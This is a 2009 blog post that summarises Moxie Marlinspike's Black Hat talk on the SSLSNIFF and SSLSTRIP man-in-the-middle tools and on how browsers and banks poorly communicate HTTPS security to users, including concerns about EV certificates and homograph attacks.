When man-in-the-middle attacks become dangerously easy to setup

Identity theftOnce in a while, you get a wake-up call and it feels like a bubble bursting, this happened after watching Moxie Marlinspike, making a persuasive presentation, made at Blackhat DC conference earlier this year, see the presentation here. Moxie explains what he has been doing with SSLSNIFF and now SSLSTRIP.

SSLSNIFF was developed in 2002, and implemented to demonstrate browser vulnerabilities in the Certification Chain Validation, where SSLSNIFF in real-time generates a SSL certificates that was accepted by the browser, by exploiting weaknesses in the certificate validation on browsers, making the user unaware on what is happening. This software was used with the famous MD5 hash collision, that was made by Alexander Sotirov et. al.

SSLSTRIP enables you to perform  an active man-in-the-middle attack, where the software actively intercepts and controls the communication and the information flow between the user and e.g. a bank, and thereby is able to perform a man-in-the-middle attack.
The SSLSTRIP was even tested for 24 hours on a Tor Router without any suspicion.


In addition to this, Moxie present insightful observations on usability aspects around communicating risk to the end-user. End-users have limited ability to understand when a browser session is secure or when it’s not, and this is clearly illustrated in the presentation. Banks are today using padlocks symbols on http traffic on the internet to communicate trust, and research indicates that such mechanism gives user a false sense of security and thereby lowers the guard of the end-user, and thereby being more susceptible to fraud.

Another interesting is the new and forthcoming EV-Certificates. A user’s mind doesn’t care if the address bar is green or white, he’s only concerned when it’s red, as it’s only then the user need to break habit and take action. If the address bar is green, it’s very unlikely that the user will also inspect the url, and I think we soon will see some even more interesting attacks with homograph attacks and EV-Certificates together with SSLSTRIP…


~ by petergullberg on July 22, 2009.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: